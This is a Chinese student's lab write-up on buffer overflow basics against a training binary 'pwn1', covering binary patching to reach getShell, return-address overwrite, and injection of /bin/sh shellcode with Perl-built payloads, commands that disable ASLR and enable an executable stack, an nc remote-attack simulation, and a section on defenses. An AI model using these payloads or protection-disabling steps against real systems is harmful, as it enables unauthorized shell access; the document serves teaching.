20191324《网络对抗技术》 exp1 逆向与Bof基础

一、实践目标

本次实践的对象是一个名为pwn1的linux可执行文件。
该程序正常执行流程是：main调用foo函数,foo函数会简单回显任何用户输入的字符串。
该程序同时包含另一个代码片段，getShell，会返回一个可用Shell。正常情况下这个代码是不会被运行的。实践的目标是想办法运行这个代码片段。

1实践内容

手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。
利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。
注入一个自己制作的shellcode并运行这段shellcode。

2基础知识

熟悉Linux基本操作
理解Bof的原理。
会使用gdb,vi。
指令、参数。
理解思路。

2.1掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码：

NOP：NOP指令即“空指令”。执行到NOP指令时，CPU什么也不做，仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。（机器码：90），实验中我们构造滑行区就是用的这个机器命令x90。
JNE：条件转移指令，如果不相等则跳转。（机器码：75）
JE：条件转移指令，如果相等则跳转。（机器码：74）
JMP：无条件转移指令。段内直接短转Jmp short（机器码：EB）段内直接近转移Jmp near（机器码：E9）段内间接转移Jmp word（机器码：FF）段间直接(远)转移Jmp far（机器码：EA）
CMP：比较指令，功能相当于减法指令，只是对操作数之间运算比较，不保存结果。cmp指令执行后，将对标志寄存器产生影响。其他相关指令通过识别这些被影响的标志寄存器位来得知比较结果。

2.2掌握反汇编与十六进制编程器：

反汇编主要用的命令是objdump -d 目标文件 | more
十六进制编程器是wxHexEditor，可以进行十六进制的查看和相应修改，避免我们对vim编辑器的操作不熟悉导致的错误

2.3补码

计算机中的有符号数有三种表示方法，即原码、反码和补码。三种表示方法均有符号位和数值位两部分，符号位都是用0表示“正”，用1表示“负”，而数值位，三种表示方法各不相同。在计算机系统中，数值一律用补码来表示和存储。原因在于，使用补码，可以将符号位和数值域统一处理；同时，加法和减法也可以统一处理。

二、直接修改程序机器指令，改变程序执行流程

1直接修改程序机器指令，改变程序执行流程

下载目标文件pwn1，使用readelf命令来读出整个ELF文件头的内容

2复制pwn1到pwn20191324，对目标文件pwn20191324反汇编`objdump -d pwn20191324 | more`

根据内存地址80484b5，找到汇编指令"call 8048491 "，这条指令将调用位于地址8048491处的foo函数，对应机器指令为"e8 d7ffffff"，e8即跳转之意。

正常流程，此时此刻EIP的值应该是下条指令的地址，即80484ba，但如一解释e8这条指令呢，CPU就会转而执行 “EIP + d7ffffff”这个位置的指令也就是foo函数

那我们想让它调用getShell，只要修改"d7ffffff"为"getShell-80484ba"对应的补码就行。

getshell函数对应的地址为0804847d，用Windows计算器的程序员模式计算十六进制，直接 47d-4ba就能得到补码，是c3ffffff

下面我们就修改可执行文件，将其中的call指令的目标地址由d7ffffff变为c3ffffff。

3修改可执行文件，将其中的call指令的目标地址由d7ffffff变为c3ffffff

根据老师的步骤：

1.按ESC键
2.输入如下，将显示模式切换为16进制模式
:%!xxd
3.查找要修改的内容
/e8d7
4.找到后前后的内容和反汇编的对比下，确认是地方是正确的
5.修改d7为c3
6.转换16进制为原格式
:%!xxd -r
7.存盘退出vi
:wq

再反汇编看一下，call指令是否正确调用getShell

4运行后会得到shell提示符，和未修改的代码进行对比

三、通过构造输入参数，造成BOF攻击，改变程序执行流

1反汇编，了解程序的基本功能

注意这个函数getShell，我们的目标是触发这个函数

该可执行文件正常运行是调用如下函数foo，这个函数有Buffer overflow漏洞

这里读入字符串，但系统只预留了28字节的缓冲区，超出部分会造成溢出，我们的目标是覆盖返回地址

上面的call调用foo,同时在堆栈上压上返回地址值:80484ba

2确认输入字符串哪几个字符会覆盖到返回地址

根据实验指导书上的步骤进行分析，当输入的为1111111122222222333333334444444455555555可以看到eip的值0x35353535也就是5555的ASCII码

如果输入字符串1111111122222222333333334444444412345678，那 1234 这四个数最终会覆盖到堆栈上的返回地址，进而CPU会尝试运行这个位置的代码。所以只要把这四个字符替换为 getShell 的内存地址，输给pwn1，pwn1就会运行getShell。

3确认用什么值来覆盖返回地址

getShell的内存地址，通过反汇编时可以看到，即0804847d。

接下来要确认下字节序，简单说是输入11111111222222223333333344444444\x08\x04\x84\x7d,还是输入11111111222222223333333344444444\x7d\x84\x04\x08。

对比之前 eip 0x34333231 0x34333231 ，正确应用输入11111111222222223333333344444444\x7d\x84\x04\x08

4构造输入字符串

因为我们没法通过键盘输入\x7d\x84\x04\x08这样的16进制值，所以先生成包括这样字符串的一个文件。\x0a表示回车，如果没有的话，在程序运行时就需要手动按一下回车键。

perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input

关于Perl：

Perl是一门解释型语言，不需要预编译，可以在命令行上直接使用。

使用输出重定向“>”将perl生成的字符串存储到文件input中。

可以使用16进制查看指令xxd查看input文件的内容是否如预期:

然后将input的输入，通过管道符“|”，作为目标文件pwn1的输入。命令为`(cat input; cat) | ./pwn1`

四、注入Shellcode并执行

1准备一段Shellcode

shellcode就是一段机器指令（code）
通常这段机器指令的目的是为获取一个交互式的shell（像linux的shell或类似windows下的cmd.exe），
所以这段机器指令被称为shellcode。
在实际的应用中，凡是用来注入的机器指令段都通称为shellcode，像添加一个用户、运行一条指令。

实践即使用该文章（http://www.cnblogs.com/xxy745214935/p/6477120.html，链接已失效），老师提供了新的链接[http://blog.nsfocus.net/easy-implement-shellcode-xiangjie/]，生成的shellcode。如下：

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\

2准备工作

修改设置

execstack -s pwn1 //设置堆栈可执行
execstack -q pwn1 //查询文件的堆栈是否可执行
echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化

这里我遇到了问题：关闭地址随机化权限不够，需要进入root权限才能成功，但我之前没设root账户，又新设了root的密码

3构造要注入的payload

Linux下有两种基本构造攻击buf的方法：
retaddr+nop+shellcode
nop+shellcode+retaddr。
因为retaddr在缓冲区的位置是固定的，shellcode要不在它前面，要不在它后面。
简单说缓冲区小就把shellcode放后边，缓冲区大就把shellcode放前边
我们这个buf够放这个shellcode了
结构为：nops+shellcode+retaddr。
nop一为是了填充，二是作为“着陆区/滑行区”。

我们猜的返回地址只要落在任何一个nop上，自然会滑到我们的shellcode。

perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode

上面最后的\x4\x3\x2\x1将覆盖到堆栈上的返回地址的位置。我们得把它改为这段shellcode的地址。特别提醒：最后一个字符千万不能是\x0a。不然下面的操作就做不了了。

4确定\x4\x3\x2\x1到底该填什么

打开一个终端注入这段攻击buf

(cat input_shellcode;cat) | ./pwn1

再开另外一个终端，用gdb来调试pwn1这个进程。

首先找到我的进程号为1288，随后启动gdb进行调试。

先attach上该进程，随后设置断点。

注意在输入c(即continue那一步）时，先应返回原本进程输入一个回车！

此处我的esp值为ffffd18c↑

看到 01020304了，再往前找 ↑

看到9090310c了，再往前一点↑

从0xffffd16c开始就是我们的Shellcode ↑

这个返回地址占位也是对的：

根据实验指导书，我决定将返回地址改为0xffffd170。

失败了，为什么，从头开始：

gdb调试：

跳坑！（我真服了，这个老六）

重新开始

结构为：anything+retaddr+nops+shellcode。

根据实验指导书中：

(gdb) x/16x 0xffffd31c
//看到 01020304了，就是返回地址的位置。shellcode就挨着，所以地址是 0xffffd320

由于我于ffffd18c处看到0x01020304，而shellcode就挨着，所以地址为0xffffd190

故我的输入为：`perl -e 'print "A" x 32;print "\x90\xd1\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\x17\xff\xff\x00"' > input_shellcode`

然后试了半天，终于成功了：

是不是很简单？是不是很简单？是不是很简单？

如果你觉得的“是”，注意这个事实：以上实践是在非常简单的一个预设条件下完成的：
（1）关闭堆栈保护（gcc -fno-stack-protector）
（2）关闭堆栈执行保护(execstack -s)
（3）关闭地址随机化 (/proc/sys/kernel/randomize_va_space=0)
（4）在x32环境下
（5）在Linux实践环境
可以继续研究更换以上任何一个条件下如何继续bof攻击。

5结合nc模拟远程攻击

本例中是在同一台主机上做的实验；该实验最好在互相连通的两台Linux上做，将ip地址替换为主机1的IP即可。

首先查看ip地址：

主机1，模拟一个有漏洞的网络服务：

-l 表示listen, -p 后加端口号 -e 后加可执行文件，网络上接收的数据将作为这个程序的输入

主机2，连接主机1并发送攻击载荷：

输入shell指令还没有完，这个时候因为是两个终端，地址有可能会变化，所以我开了第三个终端单步调查看nops地址

切记关闭地址随机化，做了好几次没成功就是这个原因

我的esp内为0xffffd1cc

这里可以算出地址为0xffffd1d0，注入进ret返回地址里面

perl -e 'print "A" x 32;print "\xd0\xd1\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode

重新修改shellcode，并注入，成功。

五、Bof攻击防御技术

1从防止注入的角度。

在编译时，编译器在每次函数调用前后都加入一定的代码，用来设置和检测堆栈上设置的特定数字，以确认是否有bof攻击发生。

2注入入了也不让运行

结合CPU的页面管理机制，通过DEP/NX用来将堆栈内存区设置为不可执行。这样即使是注入的shellcode到堆栈上，也执行不了。
通过execstack -s pwn1 来设置堆栈可执行
通过execstack -q pwn1 来查询文件的堆栈是否可执行
/proc/sys/kernel/randomize_va_space用于控制Linux下内存地址随机化机制（address space layout randomization)，有以下三种情况：

0 - 表示关闭进程地址空间随机化。
1 - 表示将mmap的基址，stack和vdso页面随机化。
2 - 表示在1的基础上增加栈（heap）的随机化。

3增加shellcode的构造难度

shellcode中需要猜测返回地址的位置，需要猜测shellcode注入后的内存位置。这些都极度依赖一个事实：应用的代码段、堆栈段每次都被OS放置到固定的内存地址。ALSR，地址随机化就是让OS每次都用不同的地址加载应用。这样通过预先反汇编或调试得到的那些地址就都不正确了。

4从管理的角度：

加强编码质量。注意边界检测。使用最新的安全的库函数

六实验感想

这次实验老师说是所有实验中最简单的，我当然没信，事实证明这次实验也确实不简单，相比于其他人，我遇到了更多的问题，首先地址随机化不成功，好，我去查需要权限，我想进入root权限吧又跟我说鉴定故障，行，我再查，要重新创建新的root，终于成功。好，当我满心欢喜做到gdb调试，attach pid的时候，又给我冒出来一个prace：不允许的操作，可以，我继续查，网上说的情况我都试过了，还是不行，一看到饭点了，关机，填饱肚子最重要，好家伙下午重新做又可以了？后来才发现是因为我两个终端用户不一样，一个是pxm，另一个是root，后面的操作也还行，就是忘了关闭内存地址随机化让我重复做了很多遍怀疑人生。
总体来说，这次实验又让我重新学习了一遍缓冲区溢出攻击的原理，也确实让我对缓冲区溢出攻击的印象和理解更深了几分，而且再次接触汇编语言和机器指令也让我想起了大二学的计算机组成原理，只能说想要学好这门课，还有很多东西要学

posted on 2022-03-22 16:42 20191324 阅读(382) 评论(0) 收藏举报